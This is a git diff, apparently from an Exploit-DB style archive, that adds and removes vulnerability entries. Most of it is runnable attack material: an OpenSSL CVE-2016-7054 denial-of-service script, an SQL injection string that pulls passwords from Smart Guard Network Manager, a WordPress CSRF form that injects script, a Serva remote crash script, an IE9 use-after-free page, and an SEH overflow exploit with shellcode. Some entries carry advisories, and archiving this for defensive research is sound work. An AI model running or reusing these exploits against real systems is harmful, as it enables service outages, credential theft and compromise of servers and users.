+1. Possible vectors of attack
+- Apple Mail (double click on certificate)
+- Safari Mobile ( go to special crafted link eg https://cert.cx/appleios10/700k.php which will redirect you to CRT file )
+- other unspecified
+
+--------------------------------------------------------------------------------------
+2. Symptoms of memory overflow
+By appropriate length of the certificate, an attacker can trigger crash of:
+- profiled
+- Preferences
+- other unexpected behaviors
+
+--------------------------------------------------------------------------------------
+3. Crash log:
+- profiled
+---------------------------------------------------------------
+{"app_name":"profiled","app_version":"","bug_type":"109","timestamp":"2016-09-20 09:15:09.85 +0200","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXXXXX","slice_uuid":"XXXXXXXXXXXXXX","build_version":"","is_first_party":true,"share_with_app_devs":false,"name":"profiled"}
+Incident Identifier: XXXXXXXXXXXXXX
+CrashReporter Key: XXXXXXXXXXXXXX
+Hardware Model: iPhone6,2
+Process: profiled [1595]
+Path: /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
+Identifier: profiled
+Version: ???
+Code Type: ARM-64 (Native)
+Role: Unspecified
+Parent Process: launchd [1]
+Coalition: <none> [253]
+
+
+Date/Time: 2016-09-20 09:15:09.7892 +0200
+Launch Time: 2016-09-20 09:15:01.1603 +0200
+OS Version: iPhone OS 10.0.1 (14A403)
+Report Version: 104
+
+Exception Type: EXC_BAD_ACCESS (SIGSEGV)
+Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016e193ca0
+Termination Signal: Segmentation fault: 11
+Termination Reason: Namespace SIGNAL, Code 0xb
+Terminating Process: exc handler [0]
+Triggered by Thread: 2
+
+---------------------------------------------------------------
+
+- Preferences
+---------------------------------------------------------------
+{"app_name":"Preferences","timestamp":"2016-09-20 01:11:44.56 +0200","app_version":"1","slice_uuid":"XXXXXXXXXXX","adam_id":0,"build_version":"1.0","bundleID":"com.apple.Preferences","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXX","name":"Preferences"}
+Incident Identifier: XXXXXXXXXXX
+CrashReporter Key: XXXXXXXXXXX
+Hardware Model: iPhone6,2
+Process: Preferences [1517]
+Path: /Applications/Preferences.app/Preferences
+Identifier: com.apple.Preferences
+Version: 1.0 (1)
+Code Type: ARM-64 (Native)
+Role: Foreground
+Parent Process: launchd [1]
+Coalition: com.apple.Preferences [754]
+
+
+Date/Time: 2016-09-20 01:11:43.4478 +0200
+Launch Time: 2016-09-20 01:10:54.3002 +0200
+OS Version: iPhone OS 10.0.1 (14A403)
+Report Version: 104
+
+Exception Type: EXC_BAD_ACCESS (SIGSEGV)
+Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016fc6df90
+Termination Signal: Segmentation fault: 11
+Termination Reason: Namespace SIGNAL, Code 0xb
+Terminating Process: exc handler [0]
+Triggered by Thread: 0
+---------------------------------------------------------------
+
+
+Logs:
+==============================
+Sep 20 20:17:02 xscxsc com.apple.CoreSimulator.SimDevice.27D...8F.launchd_sim[1905] (com.apple.managedconfiguration.profiled[3085]): Service exited due to signal: Segmentation fault: 11
+Sep 20 20:17:02 xscxsc MobileSafari[2870]: (Error) MC: Queue data for acceptance error. Error: NSError:
+Desc : Couldn’t communicate with a helper application.
+Sugg : Try your operation again. If that fails, quit and relaunch the application and try again.
+Domain : NSCocoaErrorDomain
+Code : 4097
+Extra info:
+{
+NSDebugDescription = "connection to service named com.apple.managedconfiguration.profiled";
+}
+Sep 20 20:17:02 xscxsc profiled[3133]: (Note ) profiled: Service starting...
+==============================
+
+--------------------------------------------------------------------------------------
+4. PoC
+https://cert.cx/appleios10/300k.php
+https://cert.cx/appleios10/500k.php
+https://cert.cx/appleios10/700k.php
+https://cert.cx/appleios10/900k.php
+
+or https://cert.cx/appleios10/expl.html
+
+just click on this link by using Safari. 
+
+EDB Proofs of Concept Mirror:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40906.zip
+
+--------------------------------------------------------------------------------------
+5. Safari and sandbox
+How is possible that safari don't ask user before run 'Preferences' app to start process of importing certificate? Safari automatically start new process without asking user for acceptance of this operation what can be exploited through http redirect to untrusted content.
+
+--------------------------------------------------------------------------------------
+
+6. References
+CAPEC-44: Overflow Binary Resource File
+https://capec.mitre.org/data/definitions/44.html
+https://cert.cx/
+https://cxsecurity.com/
+
+Best Regards/Pozdrowienia/С наилучшими пожеланиями
+Maksymilian Arciemowicz
+
+References:
+
+https://support.apple.com/HT207422
+https://support.apple.com/HT207425
+https://support.apple.com/HT207426
+https://cert.cx/appleios10/300k.php
+https://cert.cx/appleios10/500k.php
+https://cert.cx/appleios10/700k.php
+https://cert.cx/appleios10/900k.php
+https://cert.cx/appleios10/expl.html
+https://capec.mitre.org/data/definitions/44.html
\ No newline at end of file
diff --git a/platforms/linux/dos/40899.py b/platforms/linux/dos/40899.py
new file mode 100755
index 000000000..d7aabc678
--- /dev/null
+++ b/platforms/linux/dos/40899.py
@@ -0,0 +1,123 @@
+# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
+# Date: 11-12-2016
+# Software Link: https://www.openssl.org/source/old/1.1.0/
+# Exploit Author: Silverfox
+# Contact: http://twitter.com/___Silverfox___
+# Website: https://www.silverf0x00.com/
+# CVE: CVE-2016-7054
+# Category: Denial of Service
+# Type: Remote
+# Platform: Multiple
+
+1. Description
+   
+Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.
+
+https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054 
+https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/
+ 
+   
+2. Proof of Concept
+ 
+ a. Download and compile OpenSSL 1.1.0a or b
+ b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
+ c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
+ d. OpenSSL Instance crashes causing DOS
+
+### Exploit Code ###
+'''
+ *  In no event shall the author be liable
+ *  for any direct, indirect, incidential, special, exemplary or
+ *  consequential damages, including, but not limited to, procurement
+ *  of substitute goods or services, loss of use, data or profits or
+ *  business interruption, however caused and on any theory of liability,
+ *  whether in contract, strict liability, or tort, including negligence
+ *  or otherwise, arising in any way out of the use of this software,
+ *  even if advised of the possibility of such damage.
+'''
+from __future__ import print_function
+import traceback
+import sys
+
+from tlsfuzzer.runner import Runner
+from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
+        ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
+        FinishedGenerator, ApplicationDataGenerator, \
+        fuzz_encrypted_message
+from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
+        ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
+        ExpectAlert, ExpectClose, ExpectServerKeyExchange
+
+from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
+
+def usage() :
+    return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])
+
+def main():
+    if len(sys.argv) < 3:
+        print(usage())
+        return -1
+    conversations = {}
+    # 16 chars: POLY1305 tag 128 bit
+    # Tampering one bit suffices to damage the mac
+    # The payload has to be long enough to trigger heap overflow
+    n = 15000
+    fuzzes = [(-1, 1)]
+    for pos, val in fuzzes:
+        conversation = Connect(sys.argv[1], int(sys.argv[2]))
+        node = conversation
+        ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
+        node = node.add_child(ClientHelloGenerator(ciphers))
+        node = node.add_child(ExpectServerHello())
+        node = node.add_child(ExpectCertificate())
+        node = node.add_child(ExpectServerKeyExchange())
+        node = node.add_child(ExpectServerHelloDone())
+        node = node.add_child(ClientKeyExchangeGenerator())
+        node = node.add_child(ChangeCipherSpecGenerator())
+        node = node.add_child(FinishedGenerator())
+        node = node.add_child(ExpectChangeCipherSpec())
+        node = node.add_child(ExpectFinished())
+        node = node.add_child(fuzz_encrypted_message(
+            ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))
+        node = node.add_child(ExpectAlert(AlertLevel.fatal,
+                                          AlertDescription.bad_record_mac))
+        node = node.add_child(ExpectClose())
+
+        conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
+                conversation
+
+    # run the conversation
+    good = 0
+    bad = 0
+
+    for conversation_name in conversations:
+        conversation = conversations[conversation_name]
+        #print(conversation_name + "...")
+        runner = Runner(conversation)
+        res = True
+        try:
+            runner.run()
+        except:
+            print("Error while processing")
+            print(traceback.format_exc())
+            res = False
+        if res:
+            good+=1
+            print("OK")
+        else:
+            bad+=1
+
+    print("Test end")
+    print("successful: {0}".format(good))
+    print("failed: {0}".format(bad))
+
+    if bad > 0:
+        sys.exit(1)
+
+if __name__ == "__main__":
+	main()
+### End of Exploit Code ###
+
+3. Solution:
+   
+Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.
\ No newline at end of file
diff --git a/platforms/php/webapps/26326.html b/platforms/php/webapps/26326.html
deleted file mode 100755
index 00531d491..000000000
--- a/platforms/php/webapps/26326.html
+++ /dev/null
@@ -1,14 +0,0 @@
-source: http://www.securityfocus.com/bid/15017/info
-
-myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.
-
-Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 
-
-<HTML><BODY>
-<form
-action="http://www.example.com/myBloggie/index.php?mode=search"
-method="post" name="search" onsubmit="return
-checkForm(this)"><center><input type="text"
-name="keyword" size="12" value="'SQLInjection"> <input
-type="submit" value="Inject this"></center></form>
-</BODY></HTML> 
\ No newline at end of file
diff --git a/platforms/php/webapps/27957.txt b/platforms/php/webapps/27957.txt
deleted file mode 100755
index f638eb0ee..000000000
--- a/platforms/php/webapps/27957.txt
+++ /dev/null
@@ -1,12 +0,0 @@
-source: http://www.securityfocus.com/bid/18241/info
-
-MyBloggie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
-
-An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
-
-Update: Conflicting reports indicate that this issue does not exist in MyBloggie. This BID will be updated when more details are available.
-
-http://www.example.com/blog/admin.php?mybloggie_root_path=[evil script]
-
-http://www.example.com/blog/scode.php?mybloggie_root_path=[evil script]
-
diff --git a/platforms/php/webapps/40904.txt b/platforms/php/webapps/40904.txt
new file mode 100755
index 000000000..552493d34
--- /dev/null
+++ b/platforms/php/webapps/40904.txt
@@ -0,0 +1,27 @@
+# Exploit Title: SQL Injection In Smart Guard Network Manager Api
+# Date: 03/12/2016
+# Exploit Author: Rahul Raz
+# Vendor Homepage: http://www.xsinfoways.com/
+# Software Name: Smart Guard Network Manager
+# Version: 6.3.2
+# Tested on: Ubuntu Linux
+
+Vulnerability type: CWE-89: Improper Neutralization of Special Elements
+used in an SQL Command ('SQL Injection')
+
+The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
+not filtered properly and leads to SQL Injection
+
+Authentication Required: No
+
+SQL injec type- error/xpath.
+
+Any unauthenticated user can inject SQL commands on the <base-url>
+/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
+make_set(511,0,SUBSTRING(password,1,20),1) from
+login_master limit 0,1 ))-- -
+
+So an user can fetch admin details and can easily get root on that server
+if server is SmartGuard 6.0A Revolutions as php runs as user root by
+default.
+This this vulnerability can make whole server vulnerable .
diff --git a/platforms/php/webapps/40908.html b/platforms/php/webapps/40908.html
new file mode 100755
index 000000000..0486afee7
--- /dev/null
+++ b/platforms/php/webapps/40908.html
@@ -0,0 +1,64 @@
+<!--
+Details
+================
+Software: Multisite Post Duplicator
+Version: 0.9.5.1
+Homepage: http://wordpress.org/plugins/multisite-post-duplicator/
+Advisory report: https://security.dxw.com/advisories/csrf-vulnerability-in-multisite-post-duplicator-could-allow-an-attacker-to-do-almost-anything-an-admin-user-can-do/
+CVE: Awaiting assignment
+CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
+
+Description
+================
+CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do
+
+Vulnerability
+================
+Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.
+This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).
+This could also be used to view content not meant to be published.
+
+Proof of concept
+================
+Some of these values may need adjusting depending on the post IDs, blog IDs, etc.
+-->
+
+<form method=\"POST\" action=\"http://localhost/wp-admin/tools.php?page=mpd\">
+  <input type=\"text\" name=\"mpd-post-status\" value=\"draft\">
+  <input type=\"text\" name=\"mdp-prefix\" value=\"<script>alert(1)</script>\">
+  <input type=\"text\" name=\"action\" value=\"add_foobar\">
+  <input type=\"text\" name=\"el0\" value=\"post\">
+  <input type=\"text\" name=\"el1\" value=\"1\">
+  <input type=\"text\" name=\"el2\" value=\"1\">
+  <input type=\"text\" name=\"el3\" value=\"1\">
+  <input type=\"text\" name=\"duplicate-submit\" value=\"Duplicate\">
+  <input type=\"submit\">
+</form>
+
+<!--
+Mitigations
+================
+Update to version 1.1.3 or later.
+
+Disclosure policy
+================
+dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
+
+Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
+
+This vulnerability will be published if we do not receive a response to this report with 14 days.
+
+Timeline
+================
+
+2016-11-01: Discovered
+2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
+2016-12-09: Advisory published
+
+
+
+Discovered by dxw:
+================
+Tom Adams
+Please visit security.dxw.com for more information.
+-->
\ No newline at end of file
diff --git a/platforms/windows/dos/40905.py b/platforms/windows/dos/40905.py
new file mode 100755
index 000000000..b78cda58b
--- /dev/null
+++ b/platforms/windows/dos/40905.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python
+#
+#
+# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
+#
+#
+# Vendor: Patrick Masotta
+# Product web page: http://www.vercot.com
+# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
+#
+# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
+# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
+# on a single exe all of the underlying server protocols and services required by the
+# most complex PXE network boot/install scenarios simultaneously delivering Windows and
+# non-Windows assets to BIOS and UEFI based targets.
+#
+# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
+# This can be exploited to cause a denial of service attack resulting in application crash.
+#
+# ----------------------------------------------------------------------------
+#
+# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
+# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
+# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
+# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
+# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0         nv up ei pl nz ac po nc
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
+# KERNELBASE!RaiseException+0x58:
+# 74a1c54f c9              leave
+# 0:013> kb
+# # ChildEBP RetAddr  Args to Child              
+# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
+# WARNING: Stack unwind information not available. Following frames may be wrong.
+# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
+# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
+# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
+# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
+# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
+# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
+#
+# ----------------------------------------------------------------------------
+#
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2016-5378
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
+#
+#
+# 17.11.2016
+#
+
+import sys,socket
+
+if len(sys.argv) < 3:
+
+	print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
+	print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
+	sys.exit(0)
+ 
+host = sys.argv[1]
+port = int(sys.argv[2])
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect = s.connect((host, port))
+s.settimeout(251)
+s.send('z')
+s.close
diff --git a/platforms/windows/dos/40907.html b/platforms/windows/dos/40907.html
new file mode 100755
index 000000000..a6ffdcdba
--- /dev/null
+++ b/platforms/windows/dos/40907.html
@@ -0,0 +1,47 @@
+<!--
+Source: http://blog.skylined.nl/20161212001.html
+
+Synopsis
+A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
+
+Known affected software and attack vectors
+Microsoft Internet Explorer 9
+An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
+Details
+This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. EIP revealed that this was a use-after-free vulnerability. I have included a number of reports created using a predecessor of Bug­Id below.
+
+Repro.html:
+-->
+
+<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv="X-UA-Compatible" content="IE=Emulate­IE7" >
+    <script>
+      function go() {
+        document.exec­Command('Select­All');
+        document.exec­Command('superscript');
+        set­Timeout(function() {
+          o­Sup­Element=document.get­Elements­By­Tag­Name('sup')[0];
+          o­Sup­Element.swap­Node(document.document­Element);
+        }, 0);
+      }
+    </script>
+  </head>
+  <body onload="go()">
+    <address></address>
+    <fieldset></fieldset>
+  </body>
+</html>
+
+<!--
+Time-line
+27 September 2012: This vulnerability was found through fuzzing.
+3 December 2012: This vulnerability was submitted to EIP.
+10 December 2012: This vulnerability was rejected by EIP.
+12 December 2012: This vulnerability was submitted to ZDI.
+25 January 2013: This vulnerability was acquired by ZDI.
+15 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
+27 June 2013: This vulnerability was address by Microsoft in MS13-047.
+12 December 2016: Details of this vulnerability are released.
+-->
diff --git a/platforms/windows/local/40903.py b/platforms/windows/local/40903.py
new file mode 100755
index 000000000..6d52a7cb1
--- /dev/null
+++ b/platforms/windows/local/40903.py
@@ -0,0 +1,32 @@
+#!python
+#####################################################################################
+# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
+# Date: 2016-12-10
+# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
+# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
+# Tested on: Win7 SP1
+# Author: malwrforensics
+# Details: Help->Enter registration code... and paste the text from poc.txt
+#####################################################################################
+
+def write_poc(fname, buffer):
+	fhandle = open(fname , 'wb')
+	fhandle.write(buffer)
+	fhandle.close()
+
+fname="poc.txt"
+buf = '\x41' * 0xfe0
+
+#########################
+# Shellcode
+# MessageBox ad infinitum
+#########################
+shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
+"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
+"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")
+
+junk = '\x41' * 0x5e
+jmp = '\xeb\x82\x41\x41'
+nseh = '\xec\x14\x40\x00'
+buffer = buf + shellcode + junk + jmp + nseh
+write_poc(fname, buffer)
\ No newline at end of file